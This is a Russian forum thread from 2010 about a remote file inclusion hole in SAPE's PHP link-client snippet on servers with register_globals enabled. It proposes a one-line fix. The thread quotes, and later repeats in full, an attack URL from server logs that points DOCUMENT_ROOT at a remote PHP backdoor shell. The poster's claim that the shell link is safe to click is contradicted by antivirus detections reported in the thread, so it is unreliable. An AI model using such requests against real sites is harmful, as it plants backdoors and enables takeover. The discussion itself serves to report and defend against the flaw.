Форум SAPE.RU

Форум SAPE.RU (http://forum.sape.ru/index.php)
-   Ошибки при работе с системой (http://forum.sape.ru/forumdisplay.php?f=14)
-   -   Уязвимость сайта после вставки кода sape (http://forum.sape.ru/showthread.php?t=50949)

Shema 17.04.2010 18:24

Уязвимость сайта после вставки кода sape
 
Практика показала, что на некоторых хостингах и для некоторых движков код
Код:

<?php
    if (!defined('_SAPE_USER')){
        define('_SAPE_USER', 'd56b17c1d94442b8874c6ad44aae3202');
    }
    require_once($_SERVER['DOCUMENT_ROOT'].'/'._SAPE_USER.'/sape.php');
    $sape = new SAPE_client();
?>

является уязвимым! А именно строчка
require_once($_SERVER['DOCUMENT_ROOT'].'/'._SAPE_USER.'/sape.php');

Злоумышненники, используя запрос вида
http://www.ваш-сайт.ru////?_SERVER[D...afterlife.txt? могут нарушить работу вашего сайта, в том числе рассылать спам от имени вашего сайта.

В качестве строчки после _SERVER[DOCUMENT_ROOT] используется ссылка на код эксплоита (ссылка из логов http://jokernet.fileave.com/afterlife.txt? живая - можете посмотреть (это не вирус, а тело шелла, так что кликать безопасно), а заодно проверить, не случится ли чего с вашим сайтом, если его подставить на место www.ваш-сайт.ru).

Решение проблемы на стороне сайта:
заменить
Код:

require_once($_SERVER['DOCUMENT_ROOT'].'/'._SAPE_USER.'/sape.php');
на
Код:

require_once(getenv('DOCUMENT_ROOT').'/'._SAPE_USER.'/sape.php');
Просьба к разработчикам sape проверить, не противоречит ли моя замена чему-либо и, если нет, то обновить код для вставки для всех.

drak 17.04.2010 19:56

уходите с хостинга, если вас ломанули.
и гуглите про register globals

MonAmur 17.04.2010 20:13

Цитата:

ссылка из логов http://jokernet.fileave.com/afterlife.txt? живая - можете посмотреть (это не вирус, а тело шелла, так что кликать безопасно)
каспер не пустил...
Цитата:

Обнаружена угроза:
объект заражен Backdoor.PHP.Rst.f

chahlic 17.04.2010 20:16

Цитата:

Сообщение от MonAmur (Сообщение 789137)
каспер не пустил...

аналогичная фигня....

afonia 17.04.2010 20:25

Это что, такой оригинальный способ распространят вирусы ТС придумал? -)))

Shema 18.04.2010 05:01

dark, уходить с хостинга - вариант, переписать движок - тоже вариант (нормально написанный движок и нормально настроенный хостинг такой уязвимости не должны допустить), но если изменить в коде сапы одну строчку, то без потери функциональности проблемы можно избежать (кмк) на любом движке и на любом хостинге.

sylex 18.04.2010 07:26

Shema, неизвестно где и сколько еще в твоем сайте таких уязвимостей

Shema 18.04.2010 12:19

sylex, конечно, неизвестно.

И кстати проверил все свои сайты - сапа не добавила уязвимостей нормально написанному сайту. А вот затрояненный клиент на поддержку достался - куча сайтов с этой проблемой. А учитывая, что у сапы десятки тысяч сайтов, то даже пара процентов проблемных - это много. Поэтому, считаю, что если можно повысить безопасность кода, это надо сделать.

Ank 18.04.2010 19:33

Shema, абсолютно все могут НЕ пользоваться строчкой $_SERVER['DOCUMENT_ROOT'].
Что во первых - не уберет уязвимость, если она есть на этом хостинге.
2 - в приведенном примере что то сапы?

Ну а объяснить как ставить по другому чтобы было понятно ВСЕМ и работало ...

Atomic 18.04.2010 19:49

ТС, мои соболезнования, если ваш хост и сайт позволяют подставлять в ГЕт суперглобальные переменные, то...
Цитата:

http://www.xn----7sbbf2b7bj7b.ru////?_SERVER[DOCUMENT_ROOT]=http://jokernet.fileave.com/afterlife.txt?
где там сапа, ума не приложу


Часовой пояс GMT +3, время: 00:23.

Работает на vBulletin® версия 3.8.7.
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd.
Перевод: zCarot
SAPE.RU — система купли-продажи ссылок с главных и внутренних страниц сайтов.